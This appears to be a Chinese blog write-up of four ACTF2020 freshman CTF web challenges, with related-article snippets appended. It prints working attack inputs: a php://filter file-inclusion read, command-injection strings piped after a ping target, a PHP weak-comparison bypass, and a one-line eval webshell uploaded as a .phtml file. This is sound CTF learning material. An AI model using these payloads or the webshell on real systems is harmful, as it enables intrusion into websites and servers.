[ACTF2020新生赛]writeup

最新推荐文章于 2024-05-23 11:31:39 发布
最新推荐文章于 2024-05-23 11:31:39 发布
阅读量384 收藏 1
点赞数
分类专栏: Web安全-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/109584392
版权

文章目录

[ACTF2020新生赛]Include

点开链接后发现url出现file=flag.php,文件包含
在这里插入图片描述
需要用到php伪协议

php://filter/read=convert.base64-encode/resource=./flag.php

读出来的文件是以base64加密后的字符串,解密一下就出flag
resource=xxxx是用来读取文件所在路径

[ACTF2020新生赛]Exec

在这里插入图片描述
看到ping,首先想到命令执行,此题没有任何过滤,之前没学习命令执行,等随后详细总结一下命令执行的相关知识!!先把这题淦了!

先了解一下常用管道符:
1、|(就是按位或),直接执行|后面的语句

2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句

3、&(就是按位与),&前面和后面命令都要执行,无论前面真假

4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

那么我们先来查看一下文件目录:127.0.0.1 |ls
在这里插入图片描述
那就直接从根目录找吧:127.0.0.1 | find / -name flag
在这里插入图片描述
cat一下:127.0.0.1|cat /flag
在这里插入图片描述

[ACTF2020新生赛]BackupFile

在这里插入图片描述
题目提示了文件备份,那么查看文件备份
常用的文件备份命令:.bak .back .swp(vim未正常退出备份)

http://a2bb9cb9-6807-44f5-9aa9-b589ed3a25ca.node3.buuoj.cn/index.php.bak

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

弱比较:如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行,在比较时该字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值为0。所以直接传入key=123就行.

在这里插入图片描述

[ACTF2020 新生赛]——upload

在这里插入图片描述
随意上传一个文件,发现只能上传jpg、png、gif文件,
那么我们写入一句话木马修改后缀为jpg上传:

<?php @eval($_POST['pass']);?>

抓包,修改后缀为phtml(这个也涉及到了黑名单,我是一个一个试出来用phtml后缀的哈哈哈哈哈哈哈)在这里插入图片描述
Forward,发现上传成功!
在这里插入图片描述
直接给出了路径,蚁剑连接,到根目录下就能找到flag!!!

Stray.io
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
[ACTF2020 新生]Exec
weixin_55026246的博客
08-04 931
[ACTF2020 新生]Exec
[ACTF新生2020]fungame
最新发布
2302_79135465的博客
05-23 233
这其实是一个利用栈溢出漏洞,调用了另一个函数,我们知道了栈溢出后填入的地址是40233D,增地址就是栈溢出后我们输入的第二部分,就是flag的第二部分。在执行位于地址 0x402602 的指令时,指令试图访问位于内存地址 0x0(也称为空指针)的内存位置。这个还是需要一些堆栈的知识,之前滴水画堆栈图的还是没熟练掌握。感觉像是flag,但提交不对,并且没有回显,烦人。看大佬wp:这个是pwn的栈溢出,学一下。的线程在执行时遇到了这个访问冲突。跟踪x,找到了调用的这个函数。发生异常的线程 ID (
[ACTF2020 新生]Include WriteUp(超级详细)
lunan的博客
04-22 1892
[ACTF2020 新生]Include   打开靶机发现一个超链接,点击之后出现一段话 “Can you find out the flag?” 查看源码注入,无果 仔细看url,发现有flag.php   根据题目提示,该题应该是文件包含漏洞,因此可以判断出此题是PHP伪协议题目,构造payload如下 ?file=php://filter/read=convert.base64-encode/resource=flag.php   此时可以得到base64的编吗后的
BUUCTF-[ACTF2020 新生]Include 1 write up
m0_62851980的博客
04-05 1651
先打开靶机, ctrl+u查看一下页面源代码: “?file=flag.php”表示这里应该有文件包含漏洞 ,页面调用了include语句,那么我们使用php伪协议中的php://filter php://filter可以获取指定文件源码。当它与include函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致任意文件读取。 php://filter可以使用不同的参数来达到不同的作用: resource(要过滤的数据流):必写.
BUUCTF [ACTF2020 新生] Include
Senimo
10-13 771
BUUCTF [ACTF2020 新生]Include1 题目描述:感谢 Y1ng 师傅供题。 启动靶机,打开环境: 点击tips,得到提示: 可以找出flag嘛,看到链接末尾有:?file=flag.php 根据题目名以及给出的提示,判断是文件包含漏洞。 构造Payload读取文件源码: ?file=php://filter/read=convert.base64-encode/resource=flag.php 得到Base64编码后的源码,在线Base64解码得到flag: ...
BUUCTF:[ACTF新生2020]swp
末初的CSDN博客
07-23 4045
BUUCTF:[ACTF新生2020]swp
[ACTF2020 新生]BackupFile1 writeup
dlccom的博客
04-20 354
打开靶机后看见 估计还是查找备份文件的题 继续拿出dirsearch扫网站根目录,扫出了一个备份文件‘ 打开之后发现 我们看到想要拿到flag 需要 get传的参数等于”123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3“ 由于是两个==,我们知道在php里面两个等号意思是,在执行关系运算”==“时要求运算符两边的数据类型必须一致,所以如果有一方是int类型,一方是字符串类型的话,字符串类型会被强制转换为整型 那么具体怎么转换呢 1.
BUUCTF [ACTF2020 新生] Upload
Senimo
01-09 741
BUUCTF [ACTF2020 新生] Upload 考点: .phtml文件上传 前后端限制绕过 启动环境: 一个灯泡图标,点击的话会出现文件上传点: 随便上传点东西试试: 得到提示: 查看网页源码: <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()"> 表单提交后会执行checkFile()函数,在main.js中查看该函数: function checkFile()
[ACTF2020 新生]BackupFile
m0sway的博客
02-22 122
BUU CTF Web题目 [ACTF2020 新生]BackupFile 的WriteUp
【BUUCTF】[ACTF2020 新生]Exec Writeup
algae
08-23 1417
|cat /flag 标记{f40182a0-6749-43f2-b223-9651bf2ef2d0}
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
NTFS文件系统分析
09-19
### NTFS文件系统分析 #### 1. 引言 NTFS(New Technology File System)是微软公司开发的一种先进的文件系统,旨在提供更好的容错性和安全性。随着Windows操作系统的不断演进,NTFS已经成为Windows NT系列操作...
光立方888 573 2803程序
06-14
光立方是一种创新的LED显示技术,它通过三维立体排列的LED灯珠,形成一个透明、可编程的灯光展示装置。这种技术广泛应用于艺术展览、舞台效果、广告展示等领域,因其独特的视觉效果和高度的可定制性而备受青睐。...
CTFHub信息泄露
qq_45927819的博客
11-08 4259
文章目录phpinfo备份文件下载网站源码bak文件vim缓存.DS_StoreGit泄露Log phpinfo 直接Ctrl+f搜索flag 备份文件下载 网站源码 最常见的我觉得应该就是www.zip了 还真有,下载后发现flag的文本文档 里边没东西 将文件名输入到网址后边就出flag了 bak文件 题目是bak文件,那flag必然在index.php.bak中 直接出flag vim缓存 vim缓存会出现两种文件: 一种临时文件: vim中的swp即swap文件,在编辑文件时产生,它
CTF—命令执行总结
qq_45927819的博客
11-13 3846
文章目录前言空格绕过命令分割符关键词过滤编码绕过 前言 最近遇到了好多命令执行的web题,这就来总结一下这方面的知识!! 空格绕过 常见的绕过符号有: $IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、> $IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 不仅 $
RSA密码的原理及做题总结
qq_45927819的博客
09-23 3460
RSA算法:是应用最广泛的公钥密码算法 RSA算法步骤: 1.随计选择两个不相等的质数p,q 2.计算它们的乘积N=p*q 3.计算欧拉函数φ(N)=(p-1)(q-1),N的二进制长度作为密钥的长度, 4.随机选择一个加密密钥e,这里1<e<φ(N), gcd(e,φ(N))=1,即e与φ(N)互质。 5.根据以下公式求解得到解密密钥d ed=1 mod φ(N),0≤d≤N 6.发布加密密钥:(e,N) 7.保密解密密钥:(d,N) 这里的n就是N!!!! 这张图是我偷别人的哈哈哈哈
[actf2020 新生]include
03-16
好的,我理解您的请求是让我用中文回答您的问题,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全竞。该比旨在通过一系列的挑战来测试参者的网络安全技能,包括密码学、漏洞利用、逆向工程等等。 而 "include" 是一个在编程中经常使用的指令,它用于将一个文件的内容插入到另一个文件中。在 C 语言中,"include" 常用于引入头文件,以便在当前文件中使用另一个文件中定义的函数、变量等。 希望我的回答能够解决您的疑惑,如果您有任何其他问题,请随时问我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值